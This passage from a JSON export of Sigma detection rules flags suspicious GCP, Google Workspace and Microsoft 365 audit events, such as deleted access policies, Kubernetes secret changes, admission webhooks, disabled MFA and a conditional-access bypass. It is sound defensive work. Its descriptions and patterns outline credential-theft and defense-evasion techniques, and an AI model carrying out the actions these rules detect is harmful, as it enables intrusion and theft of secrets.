    "content": "title: GCP Access Policy Deleted\nid: 32438676-1dba-4ac7-bf69-b86cba995e05\nstatus: test\ndescription: |\n    Detects when an access policy that is applied to a GCP cloud resource is deleted.\n    An adversary would be able to remove access policies to gain access to a GCP cloud resource.\nreferences:\n    - https://cloud.google.com/access-context-manager/docs/audit-logging\n    - https://cloud.google.com/logging/docs/audit/understanding-audit-logs\n    - https://cloud.google.com/logging/docs/reference/audit/auditlog/rest/Shared.Types/AuditLog\nauthor: Bryan Lim\ndate: 2024-01-12\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        data.protoPayload.authorizationInfo.permission:\n            - 'accesscontextmanager.accessPolicies.delete'\n            - 'accesscontextmanager.accessPolicies.accessLevels.delete'\n            - 'accesscontextmanager.accessPolicies.accessZones.delete'\n            - 'accesscontextmanager.accessPolicies.authorizedOrgsDescs.delete'\n        data.protoPayload.authorizationInfo.granted: 'true'\n        data.protoPayload.serviceName: 'accesscontextmanager.googleapis.com'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activities\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_breakglass_container_workload_deployed.yml",
    "content": "title: GCP Break-glass Container Workload Deployed\nid: 76737c19-66ee-4c07-b65a-a03301d1573d\nstatus: test\ndescription: |\n    Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.\nreferences:\n    - https://cloud.google.com/binary-authorization\nauthor: Bryan Lim\ndate: 2024-01-12\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        data.protoPayload.resource.type: 'k8s_cluster'\n        data.protoPayload.logName:\n            - 'cloudaudit.googleapis.com/activity'\n            - 'cloudaudit.googleapis.com%2Factivity'\n        data.protoPayload.methodName: 'io.k8s.core.v1.pods.create'\n    keywords:\n        - 'image-policy.k8s.io/break-glass'\n    condition: selection and keywords\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_bucket_enumeration.yml",
    "content": "title: Google Cloud Storage Buckets Enumeration\nid: e2feb918-4e77-4608-9697-990a1aaf74c3\nstatus: test\ndescription: Detects when storage bucket is enumerated in Google Cloud.\nreferences:\n    - https://cloud.google.com/storage/docs/json_api/v1/buckets\nauthor: Austin Songer @austinsonger\ndate: 2021-08-14\nmodified: 2022-10-09\ntags:\n    - attack.discovery\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - storage.buckets.list\n            - storage.buckets.listChannels\n    condition: selection\nfalsepositives:\n    - Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_bucket_modified_or_deleted.yml",
    "content": "title: Google Cloud Storage Buckets Modified or Deleted\nid: 4d9f2ee2-c903-48ab-b9c1-8c0f474913d0\nstatus: test\ndescription: Detects when storage bucket is modified or deleted in Google Cloud.\nreferences:\n    - https://cloud.google.com/storage/docs/json_api/v1/buckets\nauthor: Austin Songer @austinsonger\ndate: 2021-08-14\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - storage.buckets.delete\n            - storage.buckets.insert\n            - storage.buckets.update\n            - storage.buckets.patch\n    condition: selection\nfalsepositives:\n    - Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_dlp_re_identifies_sensitive_information.yml",
    "content": "title: Google Cloud Re-identifies Sensitive Information\nid: 234f9f48-904b-4736-a34c-55d23919e4b7\nstatus: test\ndescription: Identifies when sensitive information is re-identified in google Cloud.\nreferences:\n    - https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify\nauthor: Austin Songer @austinsonger\ndate: 2021-08-15\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1565\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name: projects.content.reidentify\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_dns_zone_modified_or_deleted.yml",
    "content": "title: Google Cloud DNS Zone Modified or Deleted\nid: 28268a8f-191f-4c17-85b2-f5aa4fa829c3\nstatus: test\ndescription: Identifies when a DNS Zone is modified or deleted in Google Cloud.\nreferences:\n    - https://cloud.google.com/dns/docs/reference/v1/managedZones\nauthor: Austin Songer @austinsonger\ndate: 2021-08-15\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - Dns.ManagedZones.Delete\n            - Dns.ManagedZones.Update\n            - Dns.ManagedZones.Patch\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_firewall_rule_modified_or_deleted.yml",
    "content": "title: Google Cloud Firewall Modified or Deleted\nid: fe513c69-734c-4d4a-8548-ac5f609be82b\nstatus: test\ndescription: Detects  when a firewall rule is modified or deleted in Google Cloud Platform (GCP).\nreferences:\n    - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging\n    - https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html\nauthor: Austin Songer @austinsonger\ndate: 2021-08-13\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - v*.Compute.Firewalls.Delete\n            - v*.Compute.Firewalls.Patch\n            - v*.Compute.Firewalls.Update\n            - v*.Compute.Firewalls.Insert\n    condition: selection\nfalsepositives:\n    - Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.\n    - Exceptions can be added to this rule to filter expected behavior.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_full_network_traffic_packet_capture.yml",
    "content": "title: Google Full Network Traffic Packet Capture\nid: 980a7598-1e7f-4962-9372-2d754c930d0e\nstatus: test\ndescription: Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.\nreferences:\n    - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging\n    - https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html\nauthor: Austin Songer @austinsonger\ndate: 2021-08-13\nmodified: 2022-10-09\ntags:\n    - attack.collection\n    - attack.t1074\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - v*.Compute.PacketMirrorings.Get\n            - v*.Compute.PacketMirrorings.Delete\n            - v*.Compute.PacketMirrorings.Insert\n            - v*.Compute.PacketMirrorings.Patch\n            - v*.Compute.PacketMirrorings.List\n            - v*.Compute.PacketMirrorings.aggregatedList\n    condition: selection\nfalsepositives:\n    - Full Network Packet Capture may be done by a system or network administrator.\n    - If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_kubernetes_admission_controller.yml",
    "content": "title: Google Cloud Kubernetes Admission Controller\nid: 6ad91e31-53df-4826-bd27-0166171c8040\nstatus: test\ndescription: |\n  Identifies when an admission controller is executed in GCP Kubernetes.\n  A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\n  The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\n  An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\n  For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\n  An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\nreferences:\n    - https://cloud.google.com/kubernetes-engine/docs\nauthor: Austin Songer @austinsonger\ndate: 2021-11-25\nmodified: 2022-12-18\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1078\n    - attack.credential-access\n    - attack.t1552\n    - attack.t1552.007\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name|startswith: 'admissionregistration.k8s.io.v'\n        gcp.audit.method_name|contains:\n            - '.mutatingwebhookconfigurations.'\n            - '.validatingwebhookconfigurations.'\n        gcp.audit.method_name|endswith:\n            - 'create'\n            - 'patch'\n            - 'replace'\n    condition: selection\nfalsepositives:\n    - Google Cloud Kubernetes Admission Controller may be done by a system administrator.\n    - If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_kubernetes_cronjob.yml",
    "content": "title: Google Cloud Kubernetes CronJob\nid: cd3a808c-c7b7-4c50-a2f3-f4cfcd436435\nstatus: test\ndescription: |\n    Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\n    Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\n    An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\nreferences:\n    - https://cloud.google.com/kubernetes-engine/docs\n    - https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/\n    - https://kubernetes.io/docs/concepts/workloads/controllers/job/\nauthor: Austin Songer @austinsonger\ndate: 2021-11-22\nmodified: 2022-12-25\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.execution\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - io.k8s.api.batch.v*.Job\n            - io.k8s.api.batch.v*.CronJob\n    condition: selection\nfalsepositives:\n    - Google Cloud Kubernetes CronJob/Job may be done by a system administrator.\n    - If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_kubernetes_rolebinding.yml",
    "content": "title: Google Cloud Kubernetes RoleBinding\nid: 0322d9f2-289a-47c2-b5e1-b63c90901a3e\nstatus: test\ndescription: Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.\nreferences:\n    - https://github.com/elastic/detection-rules/pull/1267\n    - https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole\n    - https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control\n    - https://kubernetes.io/docs/reference/access-authn-authz/rbac/\n    - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging\nauthor: Austin Songer @austinsonger\ndate: 2021-08-09\nmodified: 2022-10-09\ntags:\n    - attack.credential-access\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - io.k8s.authorization.rbac.v*.clusterrolebindings.create\n            - io.k8s.authorization.rbac.v*.rolebindings.create\n            - io.k8s.authorization.rbac.v*.clusterrolebindings.patch\n            - io.k8s.authorization.rbac.v*.rolebindings.patch\n            - io.k8s.authorization.rbac.v*.clusterrolebindings.update\n            - io.k8s.authorization.rbac.v*.rolebindings.update\n            - io.k8s.authorization.rbac.v*.clusterrolebindings.delete\n            - io.k8s.authorization.rbac.v*.rolebindings.delete\n    condition: selection\nfalsepositives:\n    - RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_kubernetes_secrets_modified_or_deleted.yml",
    "content": "title: Google Cloud Kubernetes Secrets Modified or Deleted\nid: 2f0bae2d-bf20-4465-be86-1311addebaa3\nstatus: test\ndescription: Identifies when the Secrets are Modified or Deleted.\nreferences:\n    - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging\nauthor: Austin Songer @austinsonger\ndate: 2021-08-09\nmodified: 2022-10-09\ntags:\n    - attack.credential-access\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - io.k8s.core.v*.secrets.create\n            - io.k8s.core.v*.secrets.update\n            - io.k8s.core.v*.secrets.patch\n            - io.k8s.core.v*.secrets.delete\n    condition: selection\nfalsepositives:\n    - Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_service_account_disabled_or_deleted.yml",
    "content": "title: Google Cloud Service Account Disabled or Deleted\nid: 13f81a90-a69c-4fab-8f07-b5bb55416a9f\nstatus: test\ndescription: Identifies when a service account is disabled or deleted in Google Cloud.\nreferences:\n    - https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts\nauthor: Austin Songer @austinsonger\ndate: 2021-08-14\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1531\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name|endswith:\n            - .serviceAccounts.disable\n            - .serviceAccounts.delete\n    condition: selection\nfalsepositives:\n    - Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_service_account_modified.yml",
    "content": "title: Google Cloud Service Account Modified\nid: 6b67c12e-5e40-47c6-b3b0-1e6b571184cc\nstatus: test\ndescription: Identifies when a service account is modified in Google Cloud.\nreferences:\n    - https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts\nauthor: Austin Songer @austinsonger\ndate: 2021-08-14\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name|endswith:\n            - .serviceAccounts.patch\n            - .serviceAccounts.create\n            - .serviceAccounts.update\n            - .serviceAccounts.enable\n            - .serviceAccounts.undelete\n    condition: selection\nfalsepositives:\n    - Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_sql_database_modified_or_deleted.yml",
    "content": "title: Google Cloud SQL Database Modified or Deleted\nid: f346bbd5-2c4e-4789-a221-72de7685090d\nstatus: test\ndescription: Detect when a Cloud SQL DB has been modified or deleted.\nreferences:\n    - https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update\nauthor: Austin Songer @austinsonger\ndate: 2021-10-15\nmodified: 2022-12-25\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - cloudsql.instances.create\n            - cloudsql.instances.delete\n            - cloudsql.users.update\n            - cloudsql.users.delete\n    condition: selection\nfalsepositives:\n    - SQL Database being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_vpn_tunnel_modified_or_deleted.yml",
    "content": "title: Google Cloud VPN Tunnel Modified or Deleted\nid: 99980a85-3a61-43d3-ac0f-b68d6b4797b1\nstatus: test\ndescription: Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.\nreferences:\n    - https://any-api.com/googleapis_com/compute/docs/vpnTunnels\nauthor: Austin Songer @austinsonger\ndate: 2021-08-16\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: gcp.audit\ndetection:\n    selection:\n        gcp.audit.method_name:\n            - compute.vpnTunnels.insert\n            - compute.vpnTunnels.delete\n    condition: selection\nfalsepositives:\n    - VPN Tunnel being modified or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/gworkspace/gcp_gworkspace_application_access_levels_modified.yml",
    "content": "title: Google Workspace Application Access Level Modified\nid: 22f2fb54-5312-435d-852f-7c74f81684ca\nstatus: test\ndescription: |\n    Detects when an access level is changed for a Google workspace application.\n    An access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model.\n    An adversary would be able to remove access levels to gain easier access to Google workspace resources.\nreferences:\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings\n    - https://support.google.com/a/answer/9261439\nauthor: Bryan Lim\ndate: 2024-01-12\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098.003\nlogsource:\n    product: gcp\n    service: google_workspace.admin\ndetection:\n    selection:\n        eventService: 'admin.googleapis.com'\n        eventName: 'CHANGE_APPLICATION_SETTING'\n        setting_name|startswith: 'ContextAwareAccess'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activities changing the access levels for an application\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/gworkspace/gcp_gworkspace_application_removed.yml",
    "content": "title: Google Workspace Application Removed\nid: ee2803f0-71c8-4831-b48b-a1fc57601ee4\nstatus: test\ndescription: Detects when an an application is removed from Google Workspace.\nreferences:\n    - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST\nauthor: Austin Songer\ndate: 2021-08-26\nmodified: 2023-10-11\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: google_workspace.admin\ndetection:\n    selection:\n        eventService: admin.googleapis.com\n        eventName:\n            - REMOVE_APPLICATION\n            - REMOVE_APPLICATION_FROM_WHITELIST\n    condition: selection\nfalsepositives:\n    - Application being removed may be performed by a System Administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/gworkspace/gcp_gworkspace_granted_domain_api_access.yml",
    "content": "title: Google Workspace Granted Domain API Access\nid: 04e2a23a-9b29-4a5c-be3a-3542e3f982ba\nstatus: test\ndescription: Detects when an API access service account is granted domain authority.\nreferences:\n    - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS\nauthor: Austin Songer\ndate: 2021-08-23\nmodified: 2023-10-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: gcp\n    service: google_workspace.admin\ndetection:\n    selection:\n        eventService: admin.googleapis.com\n        eventName: AUTHORIZE_API_CLIENT_ACCESS\n    condition: selection\nfalsepositives:\n    - Unknown\n\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/gworkspace/gcp_gworkspace_mfa_disabled.yml",
    "content": "title: Google Workspace MFA Disabled\nid: 780601d1-6376-4f2a-884e-b8d45599f78c\nstatus: test\ndescription: Detects when multi-factor authentication (MFA) is disabled.\nreferences:\n    - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION\nauthor: Austin Songer\ndate: 2021-08-26\nmodified: 2023-10-11\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: google_workspace.admin\ndetection:\n    selection_base:\n        eventService: admin.googleapis.com\n        eventName:\n            - ENFORCE_STRONG_AUTHENTICATION\n            - ALLOW_STRONG_AUTHENTICATION\n    selection_eventValue:\n        new_value: 'false'\n    condition: all of selection*\nfalsepositives:\n    - MFA may be disabled and performed by a system administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/gworkspace/gcp_gworkspace_role_modified_or_deleted.yml",
    "content": "title: Google Workspace Role Modified or Deleted\nid: 6aef64e3-60c6-4782-8db3-8448759c714e\nstatus: test\ndescription: Detects when an a role is modified or deleted in Google Workspace.\nreferences:\n    - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings\nauthor: Austin Songer\ndate: 2021-08-24\nmodified: 2023-10-11\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: google_workspace.admin\ndetection:\n    selection:\n        eventService: admin.googleapis.com\n        eventName:\n            - DELETE_ROLE\n            - RENAME_ROLE\n            - UPDATE_ROLE\n    condition: selection\nfalsepositives:\n    - Unknown\n\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/gworkspace/gcp_gworkspace_role_privilege_deleted.yml",
    "content": "title: Google Workspace Role Privilege Deleted\nid: bf638ef7-4d2d-44bb-a1dc-a238252e6267\nstatus: test\ndescription: Detects when an a role privilege is deleted in Google Workspace.\nreferences:\n    - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings\nauthor: Austin Songer\ndate: 2021-08-24\nmodified: 2023-10-11\ntags:\n    - attack.impact\nlogsource:\n    product: gcp\n    service: google_workspace.admin\ndetection:\n    selection:\n        eventService: admin.googleapis.com\n        eventName: REMOVE_PRIVILEGE\n    condition: selection\nfalsepositives:\n    - Unknown\n\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml",
    "content": "title: Google Workspace User Granted Admin Privileges\nid: 2d1b83e4-17c6-4896-a37b-29140b40a788\nstatus: test\ndescription: Detects when an Google Workspace user is granted admin privileges.\nreferences:\n    - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3\n    - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE\nauthor: Austin Songer\ndate: 2021-08-23\nmodified: 2023-10-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: gcp\n    service: google_workspace.admin\ndetection:\n    selection:\n        eventService: admin.googleapis.com\n        eventName:\n            - GRANT_DELEGATED_ADMIN_PRIVILEGES\n            - GRANT_ADMIN_PRIVILEGE\n    condition: selection\nfalsepositives:\n    - Google Workspace admin role privileges, may be modified by system administrators.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/audit/microsoft365_bypass_conditional_access.yml",
    "content": "title: Azure Login Bypassing Conditional Access Policies\nid: 13f2d3f5-6497-44a7-bf5f-dc13ffafe5dc\nstatus: experimental\ndescription: |\n    Detects a successful login to the Microsoft Intune Company Portal which could allow bypassing Conditional Access Policies and InTune device trust using a tool like TokenSmith.\nauthor: Josh Nickels, Marius Rothenbücher\nreferences:\n    - https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/\n    - https://github.com/JumpsecLabs/TokenSmith\ndate: 2025-01-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\nlogsource:\n    service: audit\n    product: m365\ndetection:\n    selection:\n        Operation: 'UserLoggedIn'\n        ApplicationId: '9ba1a5c7-f17a-4de9-a1f1-6178c8d51223'\n        ResultStatus: 'Success'\n        RequestType: 'Cmsi:Cmsi'\n    filter_main_bjectid:\n        ObjectId: '0000000a-0000-0000-c000-000000000000' # Microsoft Intune seen when mobile devices are enrolled\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/cloud/m365/audit/microsoft365_disabling_mfa.yml",
    "content": "title: Disabling Multi Factor Authentication\nid: 60de9b57-dc4d-48b9-a6a0-b39e0469f876\nstatus: test\ndescription: Detects disabling of Multi Factor Authentication.\nreferences:\n    - https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/\nauthor: Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)\ndate: 2023-09-18\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1556.006\nlogsource:\n    service: audit\n    product: m365\ndetection:\n    selection:\n        Operation|contains: 'Disable Strong Authentication.'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/cloud/m365/audit/microsoft365_new_federated_domain_added_audit.yml",
    "content": "title: New Federated Domain Added\nid: 58f88172-a73d-442b-94c9-95eaed3cbb36\nrelated:\n    - id: 42127bdd-9133-474f-a6f1-97b6c08a4339\n      type: similar\nstatus: test\ndescription: Detects the addition of a new Federated Domain.\nreferences:\n    - https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/\n    - https://o365blog.com/post/aadbackdoor/\nauthor: Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)\ndate: 2023-09-18\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484.002\nlogsource:\n    service: audit\n    product: m365\ndetection:\n    selection_domain:\n        Operation|contains: 'domain'\n    selection_operation:\n        Operation|contains:\n            - 'add'\n            - 'new'\n    condition: all of selection_*\nfalsepositives:\n    - The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/exchange/microsoft365_new_federated_domain_added_exchange.yml",
    "content": "title: New Federated Domain Added - Exchange\nid: 42127bdd-9133-474f-a6f1-97b6c08a4339\nrelated:\n    - id: 58f88172-a73d-442b-94c9-95eaed3cbb36\n      type: similar\nstatus: test\ndescription: Detects the addition of a new Federated Domain.\nreferences:\n    - https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf\n    - https://us-cert.cisa.gov/ncas/alerts/aa21-008a\n    - https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html\n    - https://www.sygnia.co/golden-saml-advisory\n    - https://o365blog.com/post/aadbackdoor/\nauthor: Splunk Threat Research Team (original rule), '@ionsor (rule)'\ndate: 2022-02-08\ntags:\n    - attack.persistence\n    - attack.t1136.003\nlogsource:\n    service: exchange\n    product: m365\ndetection:\n    selection:\n        eventSource: Exchange\n        eventName: 'Add-FederatedDomain'\n        status: success\n    condition: selection\nfalsepositives:\n    - The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_detection/microsoft365_from_susp_ip_addresses.yml",
    "content": "title: Activity from Suspicious IP Addresses\nid: a3501e8e-af9e-43c6-8cd6-9360bdaae498\nstatus: test\ndescription: |\n  Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.\n  These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy\n    - https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference\nauthor: Austin Songer @austinsonger\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.t1573\nlogsource:\n    service: threat_detection\n    product: m365\ndetection:\n    selection:\n        eventSource: SecurityComplianceCenter\n        eventName: 'Activity from suspicious IP addresses'\n        status: success\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/m365/threat_management/microsoft365_activity_by_terminated_user.yml",
